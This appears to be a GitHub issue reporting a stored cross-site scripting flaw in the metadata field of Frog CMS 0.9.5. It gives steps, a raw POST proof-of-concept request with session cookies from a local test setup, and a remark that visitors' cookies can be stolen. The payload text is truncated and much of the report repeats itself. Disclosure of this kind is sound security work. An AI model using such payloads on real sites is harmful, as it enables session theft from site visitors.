Frog CMS simplifies content management by offering an elegant user interface, flexible templating per page, simple user management and permissions, as well as the tools necessary for file management.
GNU General Public License v3.0
160
stars
36
forks
source link
Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #6
I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
pages-->Edit Page-->Metadata
payload: "/>
i think you can see the following picture to konw more.
Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
If people read our articles, we can easily get their cookie.
payload:"/>
Affected Version:
0.9.5
I have found a stored Cross Site Scripting Vulnerability. log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/ publish an article,and you can click it. pages-->Edit Page-->Metadata payload: "/> i think you can see the following picture to konw more.
POC: POST /test/FrogCMS-master/admin/?/page/edit/3 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/page/edit/3 Content-Type: application/x-www-form-urlencoded Content-Length: 675 Cookie: current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e Connection: keep-alive Upgrade-Insecure-Requests: 1
page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close
when we published the article and we can see it from homepage. URL:http://127.0.0.1/test/FrogCMS-master/
Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest. If people read our articles, we can easily get their cookie. payload:"/> Affected Version: 0.9.5